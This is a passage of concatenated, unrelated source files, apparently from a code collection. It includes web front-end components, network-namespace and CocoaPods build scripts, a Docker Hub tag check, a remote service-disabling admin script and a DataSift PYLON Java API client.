    m_numBytesConsumed += numBytesConsumed;
    return ins;
}
// True once every byte of the input buffer has been consumed by next().
bool InstructionStream::finished() {
    const bool exhausted = m_numBytesConsumed >= m_size;
    return exhausted;
}
|
<reponame>tm3cheun/tm3cheun
'use strict';

// Declare app level module which depends on views, and components
var app = angular.module('myApp', [
    'ngRoute',
    'myApp.home',
    'myApp.photography',
    'myApp.gallery',
    'myApp.project',
    'myApp.projects',
    'myApp.version'
]);

// Route table: each section of the site maps onto a template + controller
// pair; unknown URLs fall back to the home page.
app.config(['$locationProvider', '$routeProvider', function($locationProvider, $routeProvider) {
    // Use '#' (no '!') as the hash prefix for legacy-style URLs.
    $locationProvider.hashPrefix('');
    $routeProvider
        .when('/', {
            templateUrl : 'home/home.html',
            controller : 'HomeCtrl'
        })
        .when('/photography', {
            templateUrl: 'photography/photography.html',
            controller: 'photographyCtrl'
        })
        .when('/photography/:galleryId', {
            templateUrl: 'photography/gallery.html',
            controller: 'galleryCtrl'
        })
        .when('/projects', {
            templateUrl: 'projects/projects.html',
            controller: 'projectsCtrl'
        })
        .when('/projects/:projectId', {
            templateUrl: 'projects/project.html',
            controller: 'projectCtrl'
        })
        .otherwise({
            redirectTo: '/'
        });
    // Serve clean URLs without requiring a <base> tag in index.html.
    $locationProvider.html5Mode({
        enabled: true,
        requireBase: false
    });
}]);

// Offset anchor scrolling so targets are not hidden behind the fixed header.
app.run(['$anchorScroll', function($anchorScroll) {
    $anchorScroll.yOffset = 50;
}]);
#! /bin/bash
# Plumbs a veth pair between the root network namespace and a "server1"
# namespace, bridged via $dest_bridge, with routes set up in both directions.
# Usage: run with no argument to set up, --clean to tear down, or --vmsetup
# to re-home the VM's tap interface onto the new bridge.
set -e #abort on first command returning a failure

source_net=10.0.0.0/24
source_bridge=bridge43
dest_net=10.42.42.0/24
dest_bridge=bridge44
dest_gateway=10.42.42.2
if1=tap0
if2=tap1

export NSNAME="server1"
shopt -s expand_aliases
# Shorthand for running a command inside the namespace.
alias server1="sudo ip netns exec $NSNAME"

setup() {
    # Create veth link
    sudo ip link add veth_src type veth peer name veth_dest
    # Bring up source end
    sudo ip link set veth_src up
    # Add network namespace
    sudo ip netns add $NSNAME
    # Add destination to namespace
    sudo ip link set veth_dest netns $NSNAME
    # Bring up destination end, with IP, inside namespace
    server1 ip addr add $dest_gateway/24 dev veth_dest
    server1 ip link set veth_dest up
    server1 ip link set lo up
    # Create a second bridge and bring it up, no IP
    sudo ip link add name $dest_bridge type bridge
    sudo ip link set dev $dest_bridge up
    # Add source end to bridge44
    sudo ip link set dev veth_src master $dest_bridge
    # Route all traffic to the isolated network via bridge43
    sudo ip route add $dest_net dev $source_bridge
    # Route all traffic from server1 back to root namespace, via veth_dest
    server1 sudo ip route add $source_net via $dest_gateway
    echo ">>> Setup complete"
}

undo(){
    # Always run all cleanup commands even if one fails
    set +e
    echo ">>> Deleting veth_src"
    sudo ip link delete veth_src
    echo ">>> Deleting $dest_bridge"
    sudo ip link set $dest_bridge down
    sudo ip link del $dest_bridge
    echo ">>> Deleting namespace and veth pair"
    sudo ip netns del $NSNAME
    echo ">>> Deleting route to namespace"
    sudo ip route del $dest_net dev $source_bridge
}

vmsetup(){
    # Detach the VM's second tap interface from its current bridge and
    # re-attach it to the destination bridge.
    echo ">>> Moving VM iface $if2 to $dest_bridge"
    sudo ip link set dev $if2 nomaster
    sudo ip link set dev $if2 master $dest_bridge
    sudo ip link set $if2 up
    echo ">>> Done."
}

# Dispatch on the first argument (default: full setup).
if [ "$1" == "--clean" ]
then
    undo
elif [ "$1" == "--vmsetup" ]
then
    vmsetup
else
    setup
fi
|
import React, { Component } from 'react';
import PropTypes from 'prop-types';
import { Field, change, touch, formValueSelector } from 'redux-form';
import { connect } from 'react-redux';
import { toDatePrettyPrint } from '@navikt/digisyfo-npm';
import cn from 'classnames';
import MaskedInput from 'react-maskedinput';
import Feilmelding from '../Feilmelding';
import DayPickerComponent from './DayPickerDato';
import validerDatoField from './validerDatoField';
import { fieldPropTypes } from '../../../propTypes';
/**
 * Redux-form date field: a masked dd.mm.åååå text input combined with a
 * toggleable day-picker popup. Picking a day writes the pretty-printed date
 * back into the redux-form state and marks the field as touched.
 */
export class DatoField extends Component {
    constructor(props) {
        super(props);
        this.state = {
            erApen: false, // whether the day-picker popup is open
        };
    }

    componentDidUpdate(prevProps) {
        // Notify the owner (oppdaterSporsmal) whenever the field value changes.
        const currentValue = this.props.input.value;
        const forrigeValue = prevProps.input.value;
        if (currentValue !== forrigeValue && this.props.oppdaterSporsmal) {
            this.props.oppdaterSporsmal(null, this.props.inputValue);
        }
    }

    onKeyUp(e) {
        // Close the day picker when Escape is released.
        const ESCAPE_KEYCODE = 27;
        if (e.which === ESCAPE_KEYCODE) {
            this.lukk();
        }
    }

    toggleApen() {
        if (this.state.erApen) {
            this.lukk();
        } else {
            this.apne();
        }
    }

    apne() {
        this.setState({
            erApen: true,
        });
    }

    lukk() {
        this.setState({
            erApen: false,
        });
        // Return focus to the toggle button for keyboard users.
        if (this.toggle) {
            this.toggle.focus();
        }
    }

    parseVerdi(jsDato) {
        // Pretty-print the picked JS Date; let the owner post-process the
        // string via its own parseVerdi when provided.
        const verdi = toDatePrettyPrint(new Date(jsDato));
        return !this.props.parseVerdi
            ? verdi
            : this.props.parseVerdi(verdi);
    }

    render() {
        const { meta, input, id, tidligsteFom, senesteTom } = this.props;
        const classNameMaskedInput = cn('skjemaelement__input datovelger__input', {
            'skjemaelement__input--harFeil': meta.touched && meta.error,
        });
        /* eslint-disable jsx-a11y/no-static-element-interactions */
        return (<div className="datovelger">
            <div
                className="datovelger__inner"
                onClick={(event) => {
                    // Keep clicks inside the widget from reaching
                    // document-level handlers that would close the picker.
                    try {
                        event.nativeEvent.stopImmediatePropagation();
                    } catch (e) {
                        event.stopPropagation();
                    }
                }}>
                <div className="datovelger__inputContainer">
                    <MaskedInput
                        type="tel"
                        mask="11.11.1111"
                        autoComplete="off"
                        placeholder="dd.mm.åååå"
                        id={id}
                        onKeyUp={() => {
                            // Typing manually closes the picker popup.
                            this.setState({
                                erApen: false,
                            });
                        }}
                        className={classNameMaskedInput}
                        {...input} />
                    <button
                        type="button"
                        className="js-toggle datovelger__toggleDayPicker"
                        ref={(c) => {
                            this.toggle = c;
                        }}
                        id={`toggle-${id}`}
                        onKeyUp={(e) => {
                            this.onKeyUp(e);
                        }}
                        onClick={(e) => {
                            e.preventDefault();
                            this.toggleApen();
                        }}
                        aria-pressed={this.state.erApen}>
                        {this.state.erApen ? 'Skjul datovelger' : 'Vis datovelger'}
                    </button>
                </div>
                {
                    this.state.erApen
                    && <DayPickerComponent
                        {...this.props}
                        erApen={this.state.erApen}
                        tidligsteFom={tidligsteFom}
                        senesteTom={senesteTom}
                        onDayClick={(event, jsDato) => {
                            // Write the chosen date into redux-form state,
                            // mark the field touched, then close the popup.
                            const verdi = this.parseVerdi(jsDato);
                            this.props.change(meta.form, this.props.input.name, verdi);
                            this.props.touch(meta.form, this.props.input.name);
                            this.lukk();
                        }}
                        onKeyUp={(e) => {
                            this.onKeyUp(e);
                        }}
                        lukk={() => {
                            this.lukk();
                        }} />
                }
                <Feilmelding {...meta} />
            </div>
        </div>);
        /* eslint-enable jsx-a11y/no-static-element-interactions */
    }
}
// Prop contract for the inner DatoField component.
DatoField.propTypes = {
    meta: fieldPropTypes.meta,
    id: PropTypes.string.isRequired,
    input: fieldPropTypes.input,
    touch: PropTypes.func.isRequired,
    change: PropTypes.func.isRequired,
    oppdaterSporsmal: PropTypes.func,
    parseVerdi: PropTypes.func,
    tidligsteFom: PropTypes.instanceOf(Date),
    senesteTom: PropTypes.instanceOf(Date),
    inputValue: PropTypes.oneOfType([PropTypes.shape(), PropTypes.string]),
};
// Exposes the field's current redux-form value to the component as
// `inputValue`, so componentDidUpdate can forward it on change.
const mapStateToProps = (state, ownProps) => {
    const { name } = ownProps.input;
    const selector = formValueSelector(ownProps.meta.form);
    return {
        inputValue: selector(state, name),
    };
};
// Connect DatoField to the store so it can read its own value and dispatch
// redux-form's change/touch actions.
const ConnectedDatoField = connect(mapStateToProps, { change, touch })(DatoField);
// Builds a redux-form validator for a date field, checking the (optionally
// formatted) value against the field's earliest/latest allowed dates.
export const genererValidate = (props) => {
    return (verdi) => {
        let formatertVerdi = verdi;
        if (props.format) {
            formatertVerdi = props.format(verdi);
        }
        return validerDatoField(formatertVerdi, {
            fra: props.tidligsteFom,
            til: props.senesteTom,
        });
    };
};
/**
 * Public date-picker field. Wraps redux-form's <Field> around the connected
 * DatoField and wires in the date-window validation.
 */
const Datovelger = (props) => {
    const validate = genererValidate(props);
    return (<Field
        component={ConnectedDatoField}
        validate={validate}
        {...props} />);
};

Datovelger.propTypes = {
    tidligsteFom: PropTypes.instanceOf(Date),
    senesteTom: PropTypes.instanceOf(Date),
    validate: PropTypes.func,
};

export default Datovelger;
|
<filename>src/components/Search/index.tsx
import { useState } from "react";
import { useSearch} from "../../hooks/useSearch"
import { SearchBar, SwitchButton, Container} from "./styles";
// Search panel: toggles between searching users and repositories, and
// submits the typed text as the new search argument on "Pesquisar".
export function Search() {
    const search = useSearch();
    // Local state for the text field; only submitted when the button is clicked.
    const [content, setContent] = useState("");
    return(
        // TODO(review): understand why the `key` prop is needed on SearchBar
        // here (original note, translated from Portuguese).
        <Container>
            <SwitchButton className={search.usersIsSelected} type="button"
                onClick={() => {search.handleUserButtomIsSelected(search.usersIsSelected)} }>Users</SwitchButton>
            <SwitchButton className={search.repositoriesIsSelected} type="button"
                onClick={() => {search.handleRepositoriesButtomIsSelected(search.repositoriesIsSelected)}}>Repositories</SwitchButton>
            <SearchBar key={search.argument}>
                <input value={content} onChange={event => setContent(event.target.value)} type="text" placeholder="Digite aqui." />
                <button type="button" onClick={() => search.handleNewArgument(content)}>Pesquisar</button>
            </SearchBar>
        </Container>
    )
}
/* GENERATED FILE */
import { html, svg, define } from "hybrids";
// Phosphor "dice two" icon exposed as a hybrids custom element
// (<ph-dice-two>). Each `weight` variant renders a different stroke
// width / fill style of the same 256x256 glyph.
const PhDiceTwo = {
  color: "currentColor", // inherits the surrounding text colour by default
  size: "1em",
  weight: "regular",
  mirrored: false,
  render: ({ color, size, weight, mirrored }) => html`
    <svg
      xmlns="http://www.w3.org/2000/svg"
      width="${size}"
      height="${size}"
      fill="${color}"
      viewBox="0 0 256 256"
      transform=${mirrored ? "scale(-1, 1)" : null}
    >
      ${weight === "bold" &&
      svg`<rect x="40" y="40" width="176" height="176" rx="24" stroke-width="24" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
    <circle cx="104" cy="104" r="16"/>
    <circle cx="152" cy="152" r="16"/>`}
      ${weight === "duotone" &&
      svg`<rect x="40" y="40" width="176" height="176" rx="24" opacity="0.2"/>
    <rect x="40" y="40" width="176" height="176" rx="24" stroke-width="16" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
    <circle cx="108" cy="108" r="12"/>
    <circle cx="148" cy="148" r="12"/>`}
      ${weight === "fill" &&
      svg`<path d="M192,32H64A32.03667,32.03667,0,0,0,32,64V192a32.03667,32.03667,0,0,0,32,32H192a32.03667,32.03667,0,0,0,32-32V64A32.03667,32.03667,0,0,0,192,32Zm-84,88a12,12,0,1,1,12-12A12,12,0,0,1,108,120Zm40,40a12,12,0,1,1,12-12A12,12,0,0,1,148,160Z"/>`}
      ${weight === "light" &&
      svg`<rect x="40" y="40" width="176" height="176" rx="24" stroke-width="12" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
    <circle cx="108" cy="108" r="10"/>
    <circle cx="148" cy="148" r="10"/>`}
      ${weight === "thin" &&
      svg`<rect x="40" y="40" width="176" height="176" rx="24" stroke-width="8" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
    <circle cx="108" cy="108" r="8"/>
    <circle cx="148" cy="148" r="8"/>`}
      ${weight === "regular" &&
      svg`<rect x="40" y="40" width="176" height="176" rx="24" stroke-width="16" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
    <circle cx="108" cy="108" r="12"/>
    <circle cx="148" cy="148" r="12"/>`}
    </svg>
  `,
};

// Register the custom element under its tag name and export the definition.
define("ph-dice-two", PhDiceTwo);
export default PhDiceTwo;
|
#!/bin/bash
# BUG FIX: this script uses bash-only features (arrays, `function`, `[[ ]]`,
# `set -o pipefail`, an ERR trap), so it must run under bash -- the previous
# `#!/bin/sh` shebang breaks on systems where /bin/sh is a POSIX shell (dash).
set -e
set -u
set -o pipefail

# Report the script path and line number of any command that fails.
function on_error {
  echo "$(realpath -mq "${0}"):$1: error: Unexpected failure"
}
trap 'on_error $LINENO' ERR

if [ -z ${FRAMEWORKS_FOLDER_PATH+x} ]; then
  # If FRAMEWORKS_FOLDER_PATH is not set, then there's nowhere for us to copy
  # frameworks to, so exit 0 (signalling the script phase was successful).
  exit 0
fi

echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"

COCOAPODS_PARALLEL_CODE_SIGN="${COCOAPODS_PARALLEL_CODE_SIGN:-false}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"

# Used as a return value for each invocation of `strip_invalid_archs` function.
STRIP_BINARY_RETVAL=0

# This protects against multiple targets copying the same framework dependency at the same time. The solution
# was originally proposed here: https://lists.samba.org/archive/rsync/2008-February/020158.html
RSYNC_PROTECT_TMP_FILES=(--filter "P .*.??????")
# Copies and strips a vendored framework
install_framework()
{
  # Resolve the framework: look in the build products dir (full path, then
  # basename), and finally treat $1 as an absolute/relative path.
  if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
    local source="${BUILT_PRODUCTS_DIR}/$1"
  elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
    local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
  elif [ -r "$1" ]; then
    local source="$1"
  fi

  local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"

  if [ -L "${source}" ]; then
    echo "Symlinked..."
    source="$(readlink "${source}")"
  fi

  # Use filter instead of exclude so missing patterns don't throw errors.
  echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
  rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"

  local basename
  basename="$(basename -s .framework "$1")"
  binary="${destination}/${basename}.framework/${basename}"

  # The embedded binary may live at <name>.framework/<name> or directly at
  # <name>; follow a symlink if the resolved path is one.
  if ! [ -r "$binary" ]; then
    binary="${destination}/${basename}"
  elif [ -L "${binary}" ]; then
    echo "Destination binary is symlinked..."
    dirname="$(dirname "${binary}")"
    binary="${dirname}/$(readlink "${binary}")"
  fi

  # Strip invalid architectures so "fat" simulator / device frameworks work on device
  if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
    strip_invalid_archs "$binary"
  fi

  # Resign the code if required by the build settings to avoid unstable apps
  code_sign_if_enabled "${destination}/$(basename "$1")"

  # Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
  if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
    local swift_runtime_libs
    swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u)
    for lib in $swift_runtime_libs; do
      echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
      rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
      code_sign_if_enabled "${destination}/${lib}"
    done
  fi
}
# Copies and strips a vendored dSYM
install_dsym() {
  local source="$1"
  if [ -r "$source" ]; then
    # Copy the dSYM into a the targets temp dir.
    echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${DERIVED_FILES_DIR}\""
    rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${DERIVED_FILES_DIR}"

    local basename
    basename="$(basename -s .framework.dSYM "$source")"
    binary="${DERIVED_FILES_DIR}/${basename}.framework.dSYM/Contents/Resources/DWARF/${basename}"

    # Strip invalid architectures so "fat" simulator / device frameworks work on device
    if [[ "$(file "$binary")" == *"Mach-O dSYM companion"* ]]; then
      strip_invalid_archs "$binary"
    fi

    # STRIP_BINARY_RETVAL is set by strip_invalid_archs: 1 means the binary
    # was processed (possibly stripped), 0 means no matching architectures.
    if [[ $STRIP_BINARY_RETVAL == 1 ]]; then
      # Move the stripped file into its final destination.
      echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${DERIVED_FILES_DIR}/${basename}.framework.dSYM\" \"${DWARF_DSYM_FOLDER_PATH}\""
      rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${DERIVED_FILES_DIR}/${basename}.framework.dSYM" "${DWARF_DSYM_FOLDER_PATH}"
    else
      # The dSYM was not stripped at all, in this case touch a fake folder so the input/output paths from Xcode do not reexecute this script because the file is missing.
      touch "${DWARF_DSYM_FOLDER_PATH}/${basename}.framework.dSYM"
    fi
  fi
}
# Signs a framework with the provided identity
code_sign_if_enabled() {
  # Only sign when an identity is expanded and signing is not disabled.
  if [ -n "${EXPANDED_CODE_SIGN_IDENTITY:-}" -a "${CODE_SIGNING_REQUIRED:-}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
    # Use the current code_sign_identity
    echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
    local code_sign_cmd="/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS:-} --preserve-metadata=identifier,entitlements '$1'"

    # Background the command when parallel signing is on; callers `wait` later.
    if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
      code_sign_cmd="$code_sign_cmd &"
    fi
    echo "$code_sign_cmd"
    eval "$code_sign_cmd"
  fi
}
# Strip invalid architectures
strip_invalid_archs() {
  binary="$1"
  # Get architectures for current target binary
  binary_archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | awk '{$1=$1;print}' | rev)"
  # Intersect them with the architectures we are building for
  intersected_archs="$(echo ${ARCHS[@]} ${binary_archs[@]} | tr ' ' '\n' | sort | uniq -d)"
  # If there are no archs supported by this binary then warn the user
  if [[ -z "$intersected_archs" ]]; then
    echo "warning: [CP] Vendored binary '$binary' contains architectures ($binary_archs) none of which match the current build architectures ($ARCHS)."
    STRIP_BINARY_RETVAL=0
    return
  fi
  stripped=""
  for arch in $binary_archs; do
    if ! [[ "${ARCHS}" == *"$arch"* ]]; then
      # Strip non-valid architectures in-place
      lipo -remove "$arch" -output "$binary" "$binary"
      stripped="$stripped $arch"
    fi
  done
  if [[ "$stripped" ]]; then
    echo "Stripped $binary of architectures:$stripped"
  fi
  # Signal success to the caller (install_dsym inspects this flag).
  STRIP_BINARY_RETVAL=1
}
# Embed the Pod frameworks for the active build configuration.
if [[ "$CONFIGURATION" == "Debug" ]]; then
  install_framework "${BUILT_PRODUCTS_DIR}/Alamofire/Alamofire.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/AlamofireObjectMapper/AlamofireObjectMapper.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/Kingfisher/Kingfisher.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/ObjectMapper/ObjectMapper.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
  install_framework "${BUILT_PRODUCTS_DIR}/Alamofire/Alamofire.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/AlamofireObjectMapper/AlamofireObjectMapper.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/Kingfisher/Kingfisher.framework"
  install_framework "${BUILT_PRODUCTS_DIR}/ObjectMapper/ObjectMapper.framework"
fi
# Code-sign jobs were backgrounded when parallel signing is enabled;
# wait for all of them to finish before the script phase ends.
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
  wait
fi
|
#!/usr/bin/env bash
set -x

# outputs
output_dir="s3.bcf-base-image-ubuntu-version"
mkdir -p ${output_dir}

# Extract the S3 versionId of the Ubuntu base image from the stemcell metalink.
BASE_IMAGE_VERSION=`cat git.bosh-linux-stemcell-builder/bosh-stemcell/image-metalinks/ubuntu-${UBUNTU_REL}.meta4 | grep -E "<url>|versionId=" | sed -e "s/.*versionId=//;s/<\/url>.*//"`
# Docker tags use a 7-character slice of the version id (skipping the first
# character) -- NOTE(review): presumably the leading char is a quote or
# similar artefact of the sed extraction; confirm against a sample meta4.
BASE_IMAGE_VERSION_SHORT=${BASE_IMAGE_VERSION:1:7}

# Check if the given base image with specific tag already exists
TOKEN=$( curl -sSLd "username=${DOCKER_USER}&password=${DOCKER_PASS}" https://hub.docker.com/v2/users/login | jq -r ".token" )
# grep exits 0 only when Docker Hub answers "Not found", i.e. the tag is free.
curl -sH "Authorization: JWT $TOKEN" "https://hub.docker.com/v2/repositories/${DOCKER_REPO}/tags/${BASE_IMAGE_VERSION_SHORT}/" | grep "Not found"
if [ $? -ne 0 ]; then
    # Tag already present: exit non-zero so the pipeline skips image creation.
    echo "The base-image with tag ${BASE_IMAGE_VERSION_SHORT} already exists, ignore image creation."
    exit 1
else
    echo "The base-image with tag ${BASE_IMAGE_VERSION_SHORT} does not exist, generate the version for subsequent image creation."
    echo "${BASE_IMAGE_VERSION_SHORT}" > s3.bcf-base-image-ubuntu-version/bcf-base-image-ubuntu-${UBUNTU_REL}-version
fi
package sentry
import "strings"
// ErrType represents an error which may contain hierarchical error
// information. Its string value doubles as the error message and as the
// marker text that IsInstance searches for in other errors' messages.
type ErrType string
// IsInstance will tell you whether a given error is an instance
// of this ErrType. Matching is by substring, so wrapped or annotated error
// messages that still contain this ErrType's text are recognised too.
// A nil error is never an instance of anything.
func (e ErrType) IsInstance(err error) bool {
	if err == nil {
		// BUG FIX: calling err.Error() on a nil error would panic.
		return false
	}
	return strings.Contains(err.Error(), string(e))
}
// Unwrap will unwrap this error and return the underlying error which caused
// it to be triggered. ErrType is a leaf error type with no wrapped cause, so
// this always returns nil (it exists to satisfy the errors.Unwrap contract).
func (e ErrType) Unwrap() error {
	return nil
}
// Error gets the error message for this ErrType, which is simply its
// underlying string value (this makes ErrType satisfy the error interface).
func (e ErrType) Error() string {
	return string(e)
}
|
'use strict';

exports.__esModule = true;
exports.xcodeprojLoader = exports.nibLoader = exports.commandResourceLoader = undefined;

var _path = require('path');

var _path2 = _interopRequireDefault(_path);

function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; }

// All plugin resources are emitted under this folder inside the bundle's
// Resources directory.
const WEBPACK_DIRECTORY = '_webpack_resources';

const resourceRegex = /^(?!.*\.(jsx?|tsx?|json|nib|xib|framework|xcodeproj|xcworkspace|xcworkspacedata|pbxproj)$).*/; // match everything except .jsx?, .tsx?, json, xib and nib

// Generic resource loader: copies the asset next to the plugin bundle and
// resolves its file:// URL at runtime from the running script's path.
const commandResourceLoader = exports.commandResourceLoader = {
    test: resourceRegex,
    use: {
        loader: '@skpm/file-loader',
        query: {
            raw: true,
            outputPath(url) {
                return _path2.default.posix.join('..', 'Resources', WEBPACK_DIRECTORY, url);
            },
            publicPath(url) {
                // Returns a JS *expression* (as a string) that is evaluated
                // inside the plugin to build the resource's file:// URL
                // relative to the .sketchplugin bundle.
                return `"file://" + String(context.scriptPath).split(".sketchplugin/Contents/Sketch")[0] + ".sketchplugin/Contents/Resources/${WEBPACK_DIRECTORY}/${url}"`;
            }
        }
    }
};

const nibRegex = /\.(nib|xib)?$/; // match xib or nib

// Interface-Builder files are handled by @skpm/nib-loader.
const nibLoader = exports.nibLoader = {
    test: nibRegex,
    use: {
        loader: '@skpm/nib-loader',
        query: {
            raw: true,
            outputPath(url) {
                return _path2.default.posix.join('..', 'Resources', WEBPACK_DIRECTORY, url);
            },
            publicPath(url) {
                return `${WEBPACK_DIRECTORY}/${url}`;
            }
        }
    }
};

const xcodeprojRegex = /\.(framework|xcodeproj|xcworkspace|xcworkspacedata|pbxproj)?$/; // match xcodeproj

// Xcode project/workspace bundles are handled by @skpm/xcodeproj-loader.
const xcodeprojLoader = exports.xcodeprojLoader = {
    test: xcodeprojRegex,
    use: {
        loader: '@skpm/xcodeproj-loader',
        query: {
            raw: true,
            outputPath(url) {
                return _path2.default.posix.join('..', 'Resources', WEBPACK_DIRECTORY, url);
            },
            publicPath(url) {
                return `${WEBPACK_DIRECTORY}/${url}`;
            }
        }
    }
};
#!/bin/bash
# Run a single dieharder randomness test:
#   -d 203  selects a specific test from dieharder's test list,
#   -g 7    selects built-in generator number 7,
#   -S ...  fixes the RNG seed so the run is reproducible.
# NOTE(review): exact test/generator names depend on the installed dieharder
# version (`dieharder -l` / `dieharder -g -1` list them) -- confirm locally.
dieharder -d 203 -g 7 -S 2493541151
|
#!/bin/bash
# Pushes dis_rservices.sh + dis_services to every host listed in the given
# environment file, disables services remotely, cleans up, then reboots.
# WARNING: this reboots every host in the list.
if [ $# != 1 ]
then
    echo "Arg 1 must be an environment (host list etc.....)"
    # BUG FIX: a usage error must exit non-zero, not with success status.
    exit 1
else
    SERVER=$1
    echo "$SERVER"
fi
# Iterate over whitespace-separated host names from the list file
# (quoting "$SERVER" and "$i" guards against paths/names with spaces).
for i in $(cat "$SERVER")
do
    echo "$i"
    echo
    scp -rp dis_rservices.sh dis_services "$i":
    ssh "$i" -C " sh dis_rservices.sh "
    ssh "$i" -C " chkconfig | grep 3:on "
    ssh "$i" -C " /bin/rm /root/dis_rservices.sh dis_services "
    ssh "$i" -C " reboot "
done
|
<reponame>JLLeitschuh/datasift-java<gh_stars>10-100
package com.datasift.client.pylon;
import com.datasift.client.DataSiftApiClient;
import com.datasift.client.DataSiftConfig;
import com.datasift.client.FutureData;
import com.datasift.client.ParamBuilder;
import com.fasterxml.jackson.core.JsonProcessingException;
import io.higgs.http.client.JSONRequest;
import io.higgs.http.client.Request;
import io.higgs.http.client.readers.PageReader;
import java.net.URI;
/*
 * This class provides access to the DataSift PYLON (LinkedIn) Analysis Task
 * API: listing tasks, fetching a single task, and submitting new analyses.
 */
public class DataSiftPylonTask extends DataSiftApiClient {
    /** PYLON service this client addresses. */
    protected static final String service = "linkedin";
    /** Base API path shared by all task endpoints. */
    public final String TASK = "pylon/linkedin/task/";

    /**
     * Creates a task client using the given API configuration.
     *
     * @param config credentials and endpoint settings for the DataSift API
     */
    public DataSiftPylonTask(DataSiftConfig config) {
        super(config);
    }

    /**
     * Fetches a page of analysis task results.
     *
     * @param page    1-based page number; values {@code <= 0} are omitted so
     *                the API default applies
     * @param perPage page size; values {@code <= 0} are omitted likewise
     * @return a future resolving to the requested page of task results
     */
    public FutureData<PylonTaskResultList> get(int page, int perPage) {
        FutureData<PylonTaskResultList> future = new FutureData<>();
        ParamBuilder b = new ParamBuilder();
        if (page > 0) {
            b.put("page", page);
        }
        if (perPage > 0) {
            b.put("per_page", perPage);
        }
        URI uri = b.forURL(config.newAPIEndpointURI(TASK));
        Request request = config.http().GET(uri,
                new PageReader(newRequestCallback(future, new PylonTaskResultList(), config)));
        performRequest(future, request);
        return future;
    }

    /**
     * Fetches a single analysis task by its identifier.
     *
     * @param id the task id
     * @return a future resolving to the task's current state and result
     */
    public FutureData<PylonTaskResult> get(String id) {
        URI uri = newParams().forURL(config.newAPIEndpointURI(TASK + id));
        FutureData<PylonTaskResult> future = new FutureData<>();
        Request request = config.http().GET(uri,
                new PageReader(newRequestCallback(future, new PylonTaskResult(), config)));
        performRequest(future, request);
        return future;
    }

    /**
     * Submits a new analysis task.
     *
     * @param query the task definition to run; must be non-null and
     *              serializable to JSON
     * @return a future resolving to the API's response for the submitted task
     * @throws IllegalArgumentException if {@code query} is null or cannot be
     *                                  serialized to JSON
     */
    public FutureData<PylonTaskAnalyzeResponse> analyze(PylonTaskRequest query) {
        if (query == null) {
            throw new IllegalArgumentException("A valid analyze request body is required to analyze a stream");
        }
        FutureData<PylonTaskAnalyzeResponse> future = new FutureData<PylonTaskAnalyzeResponse>();
        URI uri = newParams().forURL(config.newAPIEndpointURI(TASK));
        try {
            JSONRequest result = config.http()
                    .postJSON(uri, new PageReader(newRequestCallback(future, new PylonTaskAnalyzeResponse(), config)))
                    .setData(query);
            performRequest(future, result);
        } catch (JsonProcessingException ex) {
            throw new IllegalArgumentException("Valid JSON is required to analyze a stream");
        }
        return future;
    }
}
|
package com.cupshe.restclient.lang;
import java.lang.annotation.*;
/**
 * HttpsSupported
 * <p>Marks a type or method so that requests issued for it are sent over
